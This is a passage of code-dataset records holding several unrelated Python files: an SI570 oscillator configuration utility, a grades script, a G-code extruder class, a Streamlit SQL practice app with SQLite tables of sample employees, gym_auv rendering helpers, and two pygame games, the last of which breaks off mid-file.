s.write(0x42, 2, [0x00, 0x84]) # Output registers\n a += s.pause(2)\n a += s.read(0x42, 0, 2) # Physical pin logic levels\n a += s.read(0x44, 0, 2) # Physical pin logic levels\n\n a += s.buffer_flip() # Flip right away, so most info is minimally stale\n # This does mean that the second readout of the PCA9555 will be extra-stale\n # or even (on the first trip through) invalid.\n a += s.pause(3470)\n #\n a += busmux_sel(s, 6) # App bus\n a += s.write(0x42, 2, [0x00, 0x88]) # Output registers\n a += s.pause(2)\n a += s.read(0x42, 0, 2) # Physical pin logic levels\n a += s.pause(3470)\n if False: # extra weird little flicker\n a += s.write(0x42, 2, [0x00, 0x84]) # Output registers, LD12\n a += s.pause(1056)\n a += s.write(0x42, 2, [0x00, 0x88]) # Output registers, LD11\n a += s.pause(1056)\n a += s.jump(jump_n)\n return a\n\n\ndef hw_write_prog(reg):\n s = assem.i2c_assem()\n a = []\n a += s.pause(2) # ignored?\n a += s.set_resx(3) # avoid any confusion\n a += busmux_reset(s)\n #\n a += busmux_sel(s, 6) # App bus\n a += s.read(0xe0, 0, 1, addr_bytes=0) # busmux readback\n\n # Freeze the DCO by setting Freeze DCO=1 (bit 4 of register 137).\n a += s.write(0xee, 0x89, [0x10])\n # Write the new frequency configuration (RFREQ, HS_DIV, and N1)\n a += s.write(0xee, 0x0d, [reg[0]])\n a += s.write(0xee, 0x0e, [reg[1]])\n a += s.write(0xee, 0x0f, [reg[2]])\n a += s.write(0xee, 0x10, [reg[3]])\n a += s.write(0xee, 0x11, [reg[4]])\n a += s.write(0xee, 0x12, [reg[5]])\n # Unfreeze the DCO by setting Freeze DCO=0 (register 137 bit 4)\n a += s.write(0xee, 0x89, [0x00])\n # assert the NewFreq bit (bit 6 of register 135) within 10 ms.\n a += s.write(0xee, 0x87, [0x40])\n\n a += s.pause(100)\n\n si570_list = [0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12]\n for ax in si570_list:\n a += s.read(0xee, ax, 1) # config register0 with 2 bytes to read\n a += s.trig_analyz()\n #\n jump_n = 9\n a += s.jump(jump_n)\n a += s.pad(jump_n, len(a))\n return a\n\n\n# check if the final output frequency is <= 50 ppm\ndef check(fin):\n ppm = ((fin)*(1/args.new_freq) - 1.0)*1e6\n if (abs(ppm) <= 50):\n sys.exit(0)\n else:\n print('SI570 final frequency measurement is not correct, out of spec by %i ppm' % ppm)\n\n\ndef compute_si570(addr, key):\n # using keyword just to keep print consistent\n prog = hw_test_prog()\n result = testcase.run_testcase(addr, prog, result_len=359, debug=args.debug, verbose=args.verbose)\n if args.debug:\n print(\" \".join([\"%2.2x\" % p for p in prog]))\n print(\"\")\n for jx in range(16):\n p = result[jx*16:(jx+1)*16]\n print(\"%x \" % jx + \" \".join([\"%2.2x\" % r for r in p]))\n\n ib = 3*32 # init result memory base, derived from set_resx(3)\n a = result[ib+1:ib+7]\n\n hs_div = (a[0] >> 5) + 4\n n1 = (((a[0] & 0x1f) << 2) | (a[1] >> 6)) + 1\n rfreq = np.uint64((((a[1] & 0x3f) << 32) | (a[2] << 24) | (a[3] << 16) | (a[4] << 8) | a[5])) / (2**28)\n\n freq_default = addr.reg_read([\"frequency_si570\"])\n default = (freq_default[0]/2**24.0)*125\n # keep everything in MHz\n fdco = default * n1 * hs_div\n fxtal = fdco / rfreq\n if args.verbose:\n print('%s SI570 settings:' % key)\n print('REFREQ: %4.4f' % rfreq)\n print('N1: %3d' % n1)\n print('HSDIV: %2d' % hs_div)\n print('Internal crystal frequency: %4.4f MHz' % fxtal)\n print('DCO frequency: %4.4f MHz' % fdco)\n print('Output frequency: %4.4f MHz' % default)\n else:\n print('%s SI570 output frequency: %4.4f MHz' % (key, default))\n return fxtal, default\n\n\ndef config_si570(addr):\n if args.new_freq:\n fxtal, default = compute_si570(addr, \"Measured\")\n # if first measured frequency and new output frequency are < 10 ppm don't change/update\n if (abs(((default)*(1/args.new_freq) - 1.0)*1e6) < 10):\n sys.exit(0)\n else:\n print(\"#######################################\")\n print(\"Changing output frequency to %4.4f MHz\" % args.new_freq)\n # DCO frequency range: 4850 - 5670MHz\n # HSDIV values: 4, 5, 6, 7, 9 or 11 (subtract 4 to store)\n # N1 values: 1, 2, 4, 6, 8...128\n # Find the lowest acceptable DCO value (lowest power) see page 15 from datasheet\n best = [0, 0, 6000.0]\n for i in range(0, 65):\n n1_i = i*2\n if i == 0:\n n1_i = 1\n for hsdiv_i in [4, 5, 6, 7, 9, 11]:\n fdco_i = args.new_freq * n1_i * hsdiv_i\n if (fdco_i > 4850.0) and (fdco_i < 5670.0):\n # print(n1_i-1, hsdiv_i-4, fdco_i)\n if fdco_i < best[2]:\n best = [n1_i, hsdiv_i, fdco_i]\n\n if best[2] > 5700.0:\n raise Exception('Could not find appropriate settings for your new target frequency')\n\n if args.debug:\n print('New best option is:')\n print(best[0]-1, best[1]-4, best[2])\n\n rfreq = int(best[2] * float(2**28) / fxtal)\n rfreq_i = int(best[2] / fxtal)\n n1 = best[0]-1\n hs_div = best[1]-4\n if args.verbose:\n print('Expected SI570 settings:')\n print('REFREQ: %4.4f' % rfreq_i)\n print('N1: %3d' % best[0])\n print('HSDIV: %2d' % best[1])\n print('DCO frequency: %4.4f MHz' % best[2])\n reg = []\n # build registers\n reg7 = (hs_div << 5) | ((n1 & 0x7C) >> 2) # reg 7: hs_div[2:0], n1[6:2]\n reg8 = ((n1 & 3) << 6) | (rfreq >> 32) # reg 8: n1[1:0] rfreq[37:32]\n reg9 = (rfreq >> 24) & 0xff # reg 9: rfreq[31:24]\n reg10 = (rfreq >> 16) & 0xff # reg 10: rfreq[23:16]\n reg11 = (rfreq >> 8) & 0xff # reg 11: rfreq[15:8]\n reg12 = rfreq & 0xff # reg 12: rfreq[7:0]\n reg = [reg7, reg8, reg9, reg10, reg11, reg12]\n # write new registers\n chg = hw_write_prog(reg)\n result1 = testcase.run_testcase(addr, chg, result_len=359, debug=args.debug, verbose=args.verbose)\n if args.debug:\n print(\" \".join([\"%2.2x\" % p for p in chg]))\n print(\"\")\n for jx in range(16):\n p = result1[jx*16:(jx+1)*16]\n print(\"%x \" % jx + \" \".join([\"%2.2x\" % r for r in p]))\n # sleep for a second, so we can read the final frequency\n sleep(1)\n # read final values and output frequency?\n print(\"#######################################\")\n _, freq = compute_si570(addr, \"Final\")\n check(freq)\n else: # read only current settings if you don't want to change anything\n print(\"#######################################\")\n compute_si570(addr, \"Measured\")\n\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(\n description=\"Utility for configuring SI570 with i2cbridge attached to Packet Badger\")\n parser.add_argument('-a', '--addr', default='192.168.19.10', help='IP address')\n parser.add_argument('-p', '--port', type=int, default=803, help='Port number')\n parser.add_argument('-f', '--new_freq', type=float, default=None, help='Enter new SI570 output frequency in MHz')\n parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')\n parser.add_argument('-d', '--debug', action='store_true', help='print raw arrays')\n\n args = parser.parse_args()\n leep_addr = \"leep://\" + str(args.addr) + str(\":\") + str(args.port)\n print(leep_addr)\n\n addr = leep.open(leep_addr, instance=[])\n\n # dev = lbus_access.lbus_access(args.addr, port=args.port, timeout=3.0, allow_burst=False)\n\n config_si570(addr)\n\n# usage:\n# To read current output frequency:\n# python3 config_si570.py -a 192.168.19.31 -p 803 -d\n# To change output frequency:\n# python3 config_si570.py -a 192.168.19.31 -p 803 -d -f 185 -v\n","sub_path":"projects/test_marble_family/config_si570.py","file_name":"config_si570.py","file_ext":"py","file_size_in_byte":9926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"9252549","text":"def max_scores(gradesfile, maxscoresfile):\n \"\"\"\n Read exam scores (3 per student) from gradesfile and write the \n maximum total score and maximum exam score for each exam into \n maxscoresfile.\n\n gradesfile: name of file to be read\n maxscoresfile: name of file to be written\n \"\"\"\n gfile = open(gradesfile, 'r')\n sfile = open(maxscoresfile, 'w')\n\n # masterlist is a list of lists. Each element of the list contains\n # one line of the file, which is split into a list.\n\n masterlist = [line.split() for line in gfile]\n\n\n maxtotal = max([int(item[1]) + int(item[2]) + int(item[3]) for item in masterlist])\n maxexam1 = max([int(item[1]) for item in masterlist])\n maxexam2 = max([int(item[2]) for item in masterlist])\n maxexam3 = max([int(item[3]) for item in masterlist])\n \n sfile.write(\" Max total score: %5d\\n\"%(maxtotal))\n sfile.write(\"Max Exam 1 score: %5d\\n\"%(maxexam1))\n sfile.write(\"Max Exam 2 score: %5d\\n\"%(maxexam2))\n sfile.write(\"Max Exam 3 score: %5d\\n\"%(maxexam3))\n\n gfile.close()\n sfile.close()\n \n \n","sub_path":"OOP - Python/CODE notes/CODEnotes/jan30b.py","file_name":"jan30b.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"270501015","text":"import math\n\nclass Extruder:\n\n def __init__(self, x, y, z):\n self.x = x\n self.y = y\n self.z = z\n self.gcode = []\n self.density = 0\n self.position_cache = (0,0,0)\n self.density_cache = 0\n\n ## Set the feedrate, mm/min\n def feedrate(self, f):\n cmd = \"G1 F\" + str(f)\n self.gcode.append(cmd)\n\n ## Do nothing for some milliseconds\n def dwell(self, ms):\n cmd = \"G04 P\" + str(ms)\n self.gcode.append(cmd)\n\n ## Extrude some plastic, mm\n def extrude(self, e):\n cmd = \"G1 E\" + str(e)\n self.gcode.append(cmd)\n\n ## Draw a line of plastic to (x, y, z)\n ## using the currently set density.\n def drawline(self, x, y, z=-1):\n if z < 0: z = self.z\n dist = ((x-self.x)**2+(y-self.y)**2+(z-self.z)**2)**(1/2)\n extrude = dist * self.density\n cmd = \"G1\"\n if x != self.x: cmd += \" X\" + str(x)\n if y != self.y: cmd += \" Y\" + str(y)\n if z != self.z: cmd += \" Z\" + str(z)\n if self.density != 0: cmd += \" E\" + str(extrude)\n self.gcode.append(cmd)\n self.x = x\n self.y = y\n self.z = z\n\n ## Set the density, mm/mm of extrusion\n def set_density(self, density):\n self.density = density\n\n ## Get the currently set density, mm/mm of extrusion\n def get_density(self):\n return self.density\n\n ## Store the current density in the cache\n def cache_density(self):\n self.density_cache = self.density\n\n ## Set the density to the currently cached density\n def reset_density(self):\n self.density = self.density_cache\n\n ## Store the current position in the cache\n def cache_position(self):\n self.position_cache = (self.x, self.y, self.z)\n\n ## Go to the position currently in the cache\n def reset_position(self):\n pc = self.position_cache\n self.x = pc[0]\n self.y = pc[1]\n self.z = pc[2]\n self.goto(*pc)\n\n ## Move to (x, y, z) without extruding\n def goto(self, x, y, z=0):\n self.cache_density()\n self.set_density(0)\n if z == 0:\n self.drawline(x, y)\n else:\n self.drawline(x, y, z)\n self.reset_density()\n\n ## Move to a given height without extruding\n def setz(self, z):\n self.cache_density()\n self.set_density(0)\n self.drawline(self.x, self.y, z)\n self.reset_density()\n\n ## Extrude a line to a certain position\n ## relative to the current position\n def drawdelta(self, dx, dy, dz=0):\n self.drawline(self.x + dx, self.y + dy, self.z + dz)\n\n ## Move without extruding to a certain position\n ## relative to the current position\n def move(self, dx, dy, dz=0):\n self.cache_density()\n self.set_density(0)\n self.drawdelta(dx, dy, dz)\n self.reset_density()\n\n ## Change the height by a certain amount without extruding\n def lift(self, dz):\n self.cache_density()\n self.set_density(0)\n self.drawdelta(0, 0, dz)\n self.reset_density()\n\n ## Run custom initialization commands\n def initialize(self):\n init_cmd = '\\n'.join([\n \"G90\", ## Absolute coordinates\n \"M83\", ## E-axis relative coords\n \"G21\", ## Set units to mm\n \"M104 S215\", ## Set hotend temp\n \"M140 S60\", ## Set bed temp\n \"M109 S215\", ## Wait for hotend to heat\n \"M190 S60\", ## Wait for bed to heat\n \"G28 W\", ## Go to home\n \"G80\", ## Mesh bed leveling\n \"G1 Y-3 F1000\", ## Go out of bounds\n \"G1 X60 E9 F1000\", ## Draw test line\n \"G1 X100 E12.5 F1000\", ## Draw test line\n \"G92 E0\" ## Set E-axis to zero\n ])\n self.gcode.append(init_cmd)\n\n ## Run custom finalization commands\n def finalize(self):\n init_cmd = '\\n'.join([\n \"M104 S0\", ## Cool hotend\n \"M140 S0\", ## Cool bed\n \"M107\", ## Turn off fan\n \"G1 Z200\", ## Move extruder upwards\n \"M84\" ## Disable motors\n ])\n self.gcode.append(init_cmd)\n\n ## Save extruder history to a GCODE file\n ## WARNING: will overwrite files!\n def save(self, filename):\n f = open(filename, 'w')\n for cmd in self.gcode:\n f.write(cmd + \"\\n\")\n f.close()\n\n ## Extrude a rectangle with a given length and width\n def rectangle(self, x_len, y_len):\n self.drawdelta(x_len, 0)\n self.drawdelta(0, y_len)\n self.drawdelta(-x_len, 0)\n self.drawdelta(0, -y_len)\n\n ## Extrude a regular polygon with a given radius and number of sides\n ## centered at the current position\n def circle(self, radius, n):\n self.cache_position()\n self.move(radius, 0)\n x_diffs = [math.cos(2*math.pi*(k+1)/n) - math.cos(2*math.pi*k/n) for k in range(n)]\n y_diffs = [math.sin(2*math.pi*(k+1)/n) - math.sin(2*math.pi*k/n) for k in range(n)]\n for i in range(n):\n x_diff = x_diffs[i]\n y_diff = y_diffs[i]\n self.drawdelta(x_diff, y_diff)\n self.reset_position()\n\n ## Extrude a spiral with a given length and width\n ## which decrease by a distance delta with each iteration\n def rect_spiral(self, x_len, y_len, delta, dwell=0):\n x_move = x_len\n y_move = y_len\n sgn = 1\n while x_move > 0 and y_move > 0:\n self.drawdelta(sgn*x_move, 0)\n self.drawdelta(0, sgn*y_move)\n x_move += -delta\n y_move += -delta\n sgn = -sgn\n self.dwell(dwell)\n","sub_path":"direct-gcode/from-scratch/Extruder.py","file_name":"Extruder.py","file_ext":"py","file_size_in_byte":6043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"159973096","text":"#SQL練習アプリ\n\nimport pandas as pd\nimport streamlit as st\nimport sqlite3\nconn=sqlite3.connect(\"practice.db\")\nc=conn.cursor()\n\ndef table_init1():\n c.execute('drop table 社員')\n c.execute('CREATE TABLE IF NOT EXISTS 社員(社員コード text,氏名 text,性別 text,生年月日 date,部署 text, 入社年月日 date,上司コード text, PRIMARY KEY(社員コード))')\n sql1 = 'insert into 社員(社員コード,氏名,性別,生年月日,部署,入社年月日,上司コード) values (?,?,?,?,?,?,?)'\n data1 = [\n ('001','山田','男','19820410','経理','20060401',\"\"), \n ('002','山口', '女', '19860620','営業','20070401',\"\"), \n ('003','江藤', '男', '19900810','情報システム','20070401',\"\"), \n ('004','阿部', '女', '19830521','経理','20100401','001'), \n ('005','矢野', '男', '20000131','情報システム','20200401','003'),\n ('006','青木', '女', '19971203','営業','20200401','002')]\n c.executemany(sql1, data1)\n conn.commit()\n\ndef table_init2():\n c.execute('drop table 資格')\n c.execute('CREATE TABLE IF NOT EXISTS 資格(社員コード text,保有資格 text,取得日 date,PRIMARY KEY(社員コード,保有資格))')\n sql2 = 'insert into 資格(社員コード,保有資格,取得日) values (?,?,?)'\n data2 = [\n ('001','簿記3級', '20140610'), \n ('001','簿記2級', '20150610'), \n ('002','簿記3級', '20150610'), \n ('004','簿記3級', '20201110'), \n ('005','簿記3級', '20181110'), \n ('005','基本情報技術者', '20190420')]\n c.executemany(sql2, data2)\n conn.commit()\n\ndef exsql(sql):\n if \"SELECT\" in sql.upper():\n c.execute(sql)\n data=c.fetchall()\n return data\n else:\n c.execute(sql)\n conn.commit()\n return pd.DataFrame()\n\ndef view_all(table):\n c.execute('select * from \"{}\" '.format(table))\n data=c.fetchall()\n data=pd.DataFrame(data)\n return data\n\ncol1,col2=st.beta_columns(2)\n\nwith col1:\n button_init = st.button(\"テーブルを初期値にする\")\n sql=st.text_area(\"SQLを入力\",max_chars=1000,height=200)\n button_exec = st.button(\"SQLを実行する\")\n\n if button_exec:\n return_data=exsql(sql)\n st.write(\"実行結果\")\n st.table(return_data)\n\nwith col2:\n\n if button_init:\n table_init1()\n table_init2()\n\n shainn = view_all(\"社員\")\n colname1 = {0:\"社員コード\",1:\"氏名\",2:\"性別\",3:\"生年月日\",4:\"部署\",5:\"入社年月日\",6:\"上司コード\"}\n shainn = shainn.rename(columns=colname1)\n st.write(\"社員テーブル\")\n st.table(shainn)\n\n shikaku = view_all(\"資格\")\n colname2 = {0:\"社員コード\",1:\"保有資格\",2:\"取得日\"}\n shikaku = shikaku.rename(columns=colname2)\n st.write(\"資格テーブル\")\n st.table(shikaku)","sub_path":"sql_practice.py","file_name":"sql_practice.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"579402759","text":"import pygame\nimport numpy as np\n\nfrom typing import List\nfrom gym_auv.render2d.geometry import (\n Circle,\n FilledPolygon,\n BaseGeom,\n Line,\n PolyLine,\n)\nfrom gym_auv.render2d.state import RenderableState\nfrom gym_auv.render2d.utils import clamp_to_uint8\nfrom gym_auv.objects.obstacles import (\n BaseObstacle,\n CircularObstacle,\n PolygonObstacle,\n VesselObstacle,\n)\nfrom gym_auv.objects.vessel import Vessel\nfrom gym_auv.objects.path import Path\nfrom gym_auv.render2d import colors\nfrom gym_auv.render2d.utils import ndarray_to_vector2_list\n\n\ndef _render_path(path: Path) -> PolyLine:\n points = ndarray_to_vector2_list(path.points)\n polyline = PolyLine(points, color=colors.LIGHT_GREEN)\n\n return polyline\n\n\ndef _render_path_taken(vessel: Vessel) -> PolyLine:\n # previous positions\n points = ndarray_to_vector2_list(vessel.path_taken)\n path_taken_line = PolyLine(\n points=points,\n color=colors.BLUE_GREEN,\n )\n\n return path_taken_line\n\n\ndef _render_vessel(vessel: Vessel) -> FilledPolygon:\n vertices = [\n pygame.Vector2(-vessel.width / 2, -vessel.width / 2),\n pygame.Vector2(-vessel.width / 2, vessel.width / 2),\n pygame.Vector2(vessel.width / 2, vessel.width / 2),\n pygame.Vector2(3 / 2 * vessel.width, 0),\n pygame.Vector2(vessel.width / 2, -vessel.width / 2),\n ]\n\n vessel_shape = FilledPolygon(vertices, color=colors.ORANGE)\n\n return vessel_shape\n\n\ndef _render_sensors(vessel: Vessel) -> List[BaseGeom]:\n sensor_lines: List[BaseGeom] = []\n for isensor, sensor_angle in enumerate(vessel._sensor_angles):\n distance = vessel._last_sensor_dist_measurements[isensor]\n p0 = pygame.Vector2(0, 0)\n p1 = (\n pygame.Vector2(\n np.cos(sensor_angle),\n np.sin(sensor_angle),\n )\n * distance\n )\n\n # closeness = vessel._last_sector_dist_measurements[isector]\n closeness = vessel._last_sensor_dist_measurements[isensor]\n redness = clamp_to_uint8(int(0.5 + 0.5 * max(0, closeness) * 255))\n greenness = clamp_to_uint8(int((1 - max(0, closeness)) * 255))\n blueness = 255\n alpha = 127\n color = pygame.Color(redness, greenness, blueness, alpha)\n sensor_lines.append(Line(start=p0, end=p1, color=color))\n\n return sensor_lines\n\n\ndef _render_progress(path: Path, vessel: Vessel) -> List[BaseGeom]:\n geoms = []\n ref_point = pygame.Vector2(\n *path(vessel._last_navi_state_dict[\"vessel_arclength\"]).flatten()\n )\n geoms.append(Circle(center=ref_point, radius=1, color=colors.EGG_WHITE))\n\n target_point = pygame.Vector2(\n *path(vessel._last_navi_state_dict[\"target_arclength\"]).flatten()\n )\n geoms.append(Circle(center=target_point, radius=1, color=colors.EGG_WHITE))\n\n return geoms\n\n\ndef _render_obstacles(obstacles: List[BaseObstacle]) -> List[BaseGeom]:\n geoms = []\n for obst in obstacles:\n c = colors.EGG_WHITE\n\n if isinstance(obst, CircularObstacle):\n geoms.append(Circle(pygame.Vector2(*obst.position), obst.radius, color=c))\n\n elif isinstance(obst, PolygonObstacle):\n points = ndarray_to_vector2_list(obst.points)\n geoms.append(PolyLine(pygame.Vector2(points, color=c)))\n\n elif isinstance(obst, VesselObstacle):\n points = ndarray_to_vector2_list(obst.boundary.exterior.coords)\n geoms.append(FilledPolygon(points, color=c))\n\n return geoms\n\n\ndef make_world_frame_geoms(state: RenderableState) -> List[BaseGeom]:\n geoms = []\n\n if state.path is not None:\n geoms.append(_render_path(path=state.path))\n geoms.append(_render_path_taken(vessel=state.vessel))\n geoms.extend(_render_obstacles(obstacles=state.obstacles))\n if state.path is not None:\n geoms.extend(_render_progress(path=state.path, vessel=state.vessel))\n\n return geoms\n\n\ndef make_body_frame_geoms(state: RenderableState) -> List[BaseGeom]:\n geoms = []\n geoms.append(_render_vessel(vessel=state.vessel))\n geoms.extend(_render_sensors(vessel=state.vessel))\n\n return geoms\n","sub_path":"gym_auv/render2d/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"63445982","text":"# Import pygame library\r\nimport pygame\r\n\r\n# Initialize pygame\r\npygame.init()\r\n\r\n# Create the game window/screen\r\nscreen = pygame.display.set_mode((400,600))\r\n\r\n# Create a rectangle for paddle object\r\npaddle = pygame.Rect(200,500,30,10)\r\n\r\n# Create a rectangle for ball object\r\nball = pygame.Rect(70,50,10,10)\r\n\r\n# Game loop\r\nwhile True: \r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n \r\n # Draw blue colored paddle on screen\r\n pygame.draw.rect(screen,(23,100,100),paddle)\r\n \r\n # Draw a white colored ball on screen\r\n pygame.draw.rect(screen,(255,255,255),ball)\r\n \r\n # Update the display with paddle and ball objects\r\n pygame.display.update()\r\n","sub_path":"SA1_solution.py","file_name":"SA1_solution.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"125661559","text":"#!/usr/bin/env python3\r\n\r\nimport json\r\nimport pygame\r\nimport sys\r\nimport time\r\n\r\npygame.mixer.pre_init()\r\npygame.init()\r\n\r\n# Window settings\r\nTITLE = \"Bunny Run\"\r\nWIDTH = 1280\r\nHEIGHT = 640\r\nFPS = 60\r\nGRID_SIZE = 64\r\n\r\n# Options\r\nsound_on = True\r\n\r\n# Controls\r\nLEFT = pygame.K_LEFT\r\nRIGHT = pygame.K_RIGHT\r\nJUMP = pygame.K_SPACE\r\n\r\n# Levels\r\nlevels = [\"levels/world-1.json\",\r\n \"levels/world-2.json\",\r\n \"levels/world-3.json\",\r\n \"levels/world-4.json\"]\r\n\r\n# Colors\r\nTRANSPARENT = (0, 0, 0, 0)\r\nDARK_BLUE = (16, 86, 103)\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nPURPLE = (197, 122, 255)\r\n\r\n# Fonts\r\nBubblegum_Font = pygame.font.Font(\"assets/fonts/Bubblegum.ttf\", 32)\r\nChocolate_Bar_Font = pygame.font.Font(\"assets/fonts/Chocolate Bar.otf\", 72)\r\n\r\n# Helper functions\r\ndef load_image(file_path):\r\n img = pygame.image.load(file_path)\r\n img = pygame.transform.scale(img, (GRID_SIZE, GRID_SIZE))\r\n\r\n return img\r\n\r\ndef play_sound(sound, loops=0, maxtime=0, fade_ms=0):\r\n if sound_on:\r\n if maxtime == 0:\r\n sound.play(loops, maxtime, fade_ms)\r\n else:\r\n sound.play(loops, maxtime, fade_ms)\r\n\r\ndef play_music():\r\n if sound_on:\r\n pygame.mixer.music.play(-1)\r\n\r\n# Images\r\nbunny_walk1 = load_image(\"assets/Players/bunny2_walk1.png\")\r\nbunny_walk2 = load_image(\"assets/Players/bunny2_walk2.png\")\r\nbunny_jump = load_image(\"assets/Players/bunny2_jump.png\")\r\nbunny_idle = load_image(\"assets/Players/bunny2_stand.png\")\r\nbunny_images = {\"run\": [bunny_walk1, bunny_walk2],\r\n \"jump\": bunny_jump,\r\n \"idle\": bunny_idle}\r\n\r\nblock_images = {\"G\": load_image(\"assets/Environment/ground_grass.png\"),\r\n \"GB\": load_image(\"assets/Environment/ground_grass_broken.png\"),\r\n \"GS\": load_image(\"assets/Environment/ground_grass_small.png\"),\r\n \"GSB\": load_image(\"assets/Environment/ground_grass_small_broken.png\"),\r\n \"C\": load_image(\"assets/Environment/ground_cake.png\"),\r\n \"CB\": load_image(\"assets/Environment/ground_cake_broken.png\"),\r\n \"CS\": load_image(\"assets/Environment/ground_cake_small.png\"),\r\n \"CSB\": load_image(\"assets/Environment/ground_cake_small_broken.png\"),\r\n \"S\": load_image(\"assets/Environment/ground_sand.png\"),\r\n \"SB\": load_image(\"assets/Environment/ground_sand_broken.png\"),\r\n \"SS\": load_image(\"assets/Environment/ground_sand_small.png\"),\r\n \"SSB\": load_image(\"assets/Environment/ground_sand_small_broken.png\"),\r\n \"SN\": load_image(\"assets/Environment/ground_snow.png\"),\r\n \"SNB\": load_image(\"assets/Environment/ground_snow_broken.png\"),\r\n \"SNS\": load_image(\"assets/Environment/ground_snow_small.png\"),\r\n \"SNSB\": load_image(\"assets/Environment/ground_snow_small_broken.png\"),\r\n \"ST\": load_image(\"assets/Environment/ground_stone.png\"),\r\n \"STB\": load_image(\"assets/Environment/ground_stone_broken.png\"),\r\n \"STS\": load_image(\"assets/Environment/ground_stone_small.png\"),\r\n \"STSB\": load_image(\"assets/Environment/ground_stone_small_broken.png\"),\r\n \"W\": load_image(\"assets/Environment/ground_wood.png\"),\r\n \"WB\": load_image(\"assets/Environment/ground_wood_broken.png\"),\r\n \"WS\": load_image(\"assets/Environment/ground_wood_small.png\"),\r\n \"WSB\": load_image(\"assets/Environment/ground_wood_small_broken.png\")}\r\n\r\ncoin_img = load_image(\"assets/Items/gold_1.png\")\r\npowerup_img = load_image(\"assets/Items/powerup_bunny.png\")\r\ncarrot_img = load_image(\"assets/Items/carrot.png\")\r\nportal_img = load_image(\"assets/Items/portal_yellow.png\")\r\ngold_carrot_img = load_image(\"assets/Items/carrot_gold.png\")\r\nbubble_img = load_image(\"assets/Items/bubble.png\")\r\nbolt_img = load_image(\"assets/Particles/lighting_blue.png\")\r\njetpack_img = load_image(\"assets/Items/jetpack.png\")\r\n\r\nspikeball_img1 = load_image(\"assets/Enemies/spikeBall1.png\")\r\nspikeball_img2 = load_image(\"assets/Enemies/spikeBall2.png\")\r\nspikeball_images = [spikeball_img1, spikeball_img2]\r\n\r\nspikeman_img = load_image(\"assets/Enemies/spikeMan_stand.png\")\r\nspikeman_walk1 = load_image(\"assets/Enemies/spikeMan_walk1.png\")\r\nspikeman_walk2 = load_image(\"assets/Enemies/spikeMan_walk2.png\")\r\nspikeman_images = [spikeman_walk1, spikeman_walk2]\r\n\r\nflyman_img1 = load_image(\"assets/Enemies/flyMan_stand.png\")\r\nflyman_img2 = load_image(\"assets/Enemies/flyMan_fly.png\")\r\nflyman_images = [flyman_img1, flyman_img2]\r\n\r\n# Sounds\r\nJUMP_SOUND = pygame.mixer.Sound(\"assets/sounds/jump.wav\")\r\nCOIN_SOUND = pygame.mixer.Sound(\"assets/sounds/pickup_coin.wav\")\r\nPOWERUP_SOUND = pygame.mixer.Sound(\"assets/sounds/powerup.wav\")\r\nHURT_SOUND = pygame.mixer.Sound(\"assets/sounds/hurt.ogg\")\r\nDIE_SOUND = pygame.mixer.Sound(\"assets/sounds/death.wav\")\r\nLEVELUP_SOUND = pygame.mixer.Sound(\"assets/sounds/level_up.wav\")\r\nGAMEOVER_SOUND = pygame.mixer.Sound(\"assets/sounds/game_over.wav\")\r\n\r\nclass Entity(pygame.sprite.Sprite):\r\n\r\n def __init__(self, x, y, image):\r\n super().__init__()\r\n\r\n self.image = image\r\n self.rect = self.image.get_rect()\r\n self.rect.x = x\r\n self.rect.y = y\r\n\r\n self.vy = 0\r\n self.vx = 0\r\n\r\n def apply_gravity(self, level):\r\n self.vy += level.gravity\r\n self.vy = min(self.vy, level.terminal_velocity)\r\n\r\nclass Block(Entity):\r\n\r\n def __init__(self, x, y, image):\r\n super().__init__(x, y, image)\r\n\r\nclass Character(Entity):\r\n\r\n def __init__(self, images):\r\n super().__init__(0, 0, images['idle'])\r\n\r\n self.image_idle = images['idle']\r\n self.images_run_right = images['run']\r\n self.images_run_left = [pygame.transform.flip(img, 1, 0) for img in self.images_run_right]\r\n self.image_jump_right = images['jump']\r\n self.image_jump_left = pygame.transform.flip(self.image_jump_right, 1, 0)\r\n\r\n self.running_images = self.images_run_right\r\n self.image_index = 0\r\n self.steps = 0\r\n\r\n self.speed = 5\r\n self.jump_power = 20\r\n\r\n self.vx = 0\r\n self.vy = 0\r\n self.facing_right = True\r\n self.on_ground = True\r\n self.jetpack_on = False\r\n\r\n self.score = 0\r\n self.lives = 3\r\n self.hearts = 3\r\n self.max_hearts = 3\r\n self.invincibility = 0\r\n self.jetpack_time = 0\r\n self.coins = 0\r\n\r\n def move_left(self):\r\n self.vx = -self.speed\r\n self.facing_right = False\r\n\r\n def move_right(self):\r\n self.vx = self.speed\r\n self.facing_right = True\r\n\r\n def stop(self):\r\n self.vx = 0\r\n\r\n def jump(self, blocks):\r\n self.rect.y += 1\r\n\r\n hit_list = pygame.sprite.spritecollide(self, blocks, False)\r\n\r\n if len(hit_list) > 0:\r\n self.vy = -1 * self.jump_power\r\n play_sound(JUMP_SOUND)\r\n\r\n self.rect.y -= 1\r\n\r\n def check_world_boundaries(self, level):\r\n if self.rect.left < 0:\r\n self.rect.left = 0\r\n elif self.rect.right > level.width:\r\n self.rect.right = level.width\r\n\r\n def move_and_process_blocks(self, blocks):\r\n self.rect.x += self.vx\r\n hit_list = pygame.sprite.spritecollide(self, blocks, False)\r\n\r\n for block in hit_list:\r\n if self.vx > 0:\r\n self.rect.right = block.rect.left\r\n self.vx = 0\r\n elif self.vx < 0:\r\n self.rect.left = block.rect.right\r\n self.vx = 0\r\n\r\n self.on_ground = False\r\n self.rect.y += self.vy\r\n hit_list = pygame.sprite.spritecollide(self, blocks, False)\r\n\r\n for block in 